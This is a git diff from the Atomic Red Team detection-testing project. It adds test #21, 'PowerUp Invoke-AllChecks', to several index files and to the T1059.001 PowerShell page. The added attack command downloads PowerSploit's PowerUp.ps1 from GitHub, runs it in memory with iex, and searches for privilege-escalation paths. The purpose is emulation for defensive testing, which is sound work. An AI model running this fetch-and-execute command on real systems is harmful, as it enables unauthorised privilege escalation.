diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 04c2305d..73189ebd 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -861,6 +861,7 @@ execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedComm
execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
execution,T1059.001,PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
+execution,T1059.001,PowerShell,21,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
execution,T1059.006,Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
execution,T1059.006,Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
execution,T1059.006,Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 63a59154..c661ed1e 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -607,6 +607,7 @@ execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedComm
execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
execution,T1059.001,PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
+execution,T1059.001,PowerShell,21,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
execution,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
execution,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index b0fa87ba..4e56b5be 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1499,6 +1499,7 @@
- Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
- Atomic Test #19: PowerShell Command Execution [windows]
- Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows]
+ - Atomic Test #21: PowerUp Invoke-AllChecks [windows]
- [T1059.006 Python](../../T1059.006/T1059.006.md)
- Atomic Test #1: Execute shell script via python's command mode arguement [linux]
- Atomic Test #2: Execute Python via scripts (Linux) [linux]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 3b7aa2c0..9ca1d1bb 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1075,6 +1075,7 @@
- Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
- Atomic Test #19: PowerShell Command Execution [windows]
- Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows]
+ - Atomic Test #21: PowerUp Invoke-AllChecks [windows]
- T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index db076360..253451ca 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -62185,6 +62185,19 @@ execution:
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
+ - name: PowerUp Invoke-AllChecks
+ auto_generated_guid: 1289f78d-22d2-4590-ac76-166737e1811b
+ description: 'Check for privilege escalation paths using PowerUp from PowerShellMafia
+
+'
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
+ Invoke-AllChecks
+ name: powershell
T1059.006:
technique:
external_references:
diff --git a/atomics/T1059.001/T1059.001.md b/atomics/T1059.001/T1059.001.md
index 635b00d7..39446b03 100644
--- a/atomics/T1059.001/T1059.001.md
+++ b/atomics/T1059.001/T1059.001.md
@@ -50,6 +50,8 @@ PowerShell commands/scripts can also be executed without directly invoking the <
- [Atomic Test #20 - PowerShell Invoke Known Malicious Cmdlets](#atomic-test-20---powershell-invoke-known-malicious-cmdlets)
+- [Atomic Test #21 - PowerUp Invoke-AllChecks](#atomic-test-21---powerup-invoke-allchecks)
+
@@ -842,4 +844,34 @@ foreach ($cmdlets in $malcmdlets) {
+
+
+
+## Atomic Test #21 - PowerUp Invoke-AllChecks
+Check for privilege escalation paths using PowerUp from PowerShellMafia
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 1289f78d-22d2-4590-ac76-166737e1811b
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
+Invoke-AllChecks
+```
+
+
+
+
+
+